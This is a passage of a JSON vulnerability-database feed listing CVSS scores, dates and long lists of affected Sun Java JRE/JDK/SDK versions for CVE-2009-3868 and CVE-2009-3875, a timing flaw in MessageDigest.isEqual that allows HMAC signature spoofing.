"cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2009-3868", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3868", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_19:*:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jre:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_21:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_20:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_19:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_9:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jre:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_19:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_21:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_20:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_17:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jre:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01:*:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jre:1.5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_18:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_18:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_17:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jre:1.5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_6:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:40:06", "description": "The MessageDigest.isEqual function in Java Runtime Environment (JRE) in Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x before 1.4.2_24 allows remote attackers to spoof HMAC-based digital signatures, and possibly bypass authentication, via unspecified vectors related to \"timing attack vulnerabilities,\" aka Bug Id 6863503.", "edition": 6, "cvss3": {}, "published": "2009-11-05T16:30:00", "title": "CVE-2009-3875", "type": "cve", "cwe": ["CWE-310"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3875"], "modified": "2018-10-30T16:26:00", "cpe": ["cpe:/a:sun:sdk:1.3.1_15", "cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jre:1.4.2_21", "cpe:/a:sun:sdk:1.4.2_23", "cpe:/a:sun:jre:1.3.1_8", "cpe:/a:sun:sdk:1.3.1_16", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_13", "cpe:/a:sun:jre:1.3.1_7", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:sdk:1.3.1_02", "cpe:/a:sun:jdk:1.6.0", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:jre:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_05", "cpe:/a:sun:jre:1.3.1_08", "cpe:/a:sun:sdk:1.3.1_19", "cpe:/a:sun:jre:1.3.1_23", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.3.1_04", "cpe:/a:sun:sdk:1.3.1_3", "cpe:/a:sun:sdk:1.3.1_06", "cpe:/a:sun:jre:1.4.2_06", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:sdk:1.4.2_03", "cpe:/a:sun:jre:1.6.0", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.3.1_01a", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:sdk:1.3.1_20", "cpe:/a:sun:jre:1.3.1_14", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:sdk:1.3.1_23", "cpe:/a:sun:sdk:1.3.1_21", "cpe:/a:sun:jre:1.3.1_07", "cpe:/a:sun:sdk:1.3.1_04", "cpe:/a:sun:jre:1.3.1_12", "cpe:/a:sun:jre:1.4.2_04", "cpe:/a:sun:sdk:1.4.2_06", "cpe:/a:sun:sdk:1.3.1_09", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_01", "cpe:/a:sun:sdk:1.3.1_2", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.3.1_17", "cpe:/a:sun:sdk:1.3.1_24", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.3.1_1", "cpe:/a:sun:jre:1.3.1_21", "cpe:/a:sun:jre:1.3.1_15", "cpe:/a:sun:sdk:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_6", "cpe:/a:sun:jre:1.3.1_02", "cpe:/a:sun:sdk:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_01a", "cpe:/a:sun:sdk:1.3.1_11", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_07", 
"cpe:/a:sun:jdk:1.5.0", "cpe:/a:sun:sdk:1.3.1_9", "cpe:/a:sun:jre:1.5.0", "cpe:/a:sun:sdk:1.4.2_20", "cpe:/a:sun:sdk:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_7", "cpe:/a:sun:jre:1.3.1_11", "cpe:/a:sun:jre:1.4.2_20", "cpe:/a:sun:jre:1.3.1_16", "cpe:/a:sun:jre:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_08", "cpe:/a:sun:jre:1.3.1_20", "cpe:/a:sun:jre:1.3.1_2", "cpe:/a:sun:sdk:1.4.2_22", "cpe:/a:sun:sdk:1.3.1_01", "cpe:/a:sun:jre:1.3.1_10", "cpe:/a:sun:sdk:1.3.1_18", "cpe:/a:sun:sdk:1.3.1_14", "cpe:/a:sun:jre:1.4.2_08", "cpe:/a:sun:sdk:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_02", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:sdk:1.3.1_08", "cpe:/a:sun:jre:1.3.1_24", "cpe:/a:sun:jre:1.3.1_13", "cpe:/a:sun:jre:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_25", "cpe:/a:sun:jre:1.4.2_05", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:1.3.1_6", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_04", "cpe:/a:sun:jre:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_10", "cpe:/a:sun:jre:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_8", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_12", "cpe:/a:sun:sdk:1.3.1_5", "cpe:/a:sun:jre:1.4.2_02", "cpe:/a:sun:jre:1.3.1_06", "cpe:/a:sun:jre:1.4.2_22", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_21", "cpe:/a:sun:jre:1.3.1_18", "cpe:/a:sun:jre:1.3.1_3", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jre:1.4.2_23", "cpe:/a:sun:jre:1.4.2_03", "cpe:/a:sun:jre:1.3.1_9", "cpe:/a:sun:jre:1.4.2_07", "cpe:/a:sun:jre:1.3.1_19", "cpe:/a:sun:jre:1.3.1_5", "cpe:/a:sun:jre:1.3.1_09", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.3.1_17", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:jre:1.3.1_01", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.3.1_25", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:sdk:1.3.1_07", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2009-3875", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3875", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": 
["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update13:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update5:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update15:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update16:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update9:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update11:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update9:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update10:*:*:*:*:*:*", 
"cpe:2.3:a:sun:sdk:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update21:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update9:*:*:*:*:*:*", 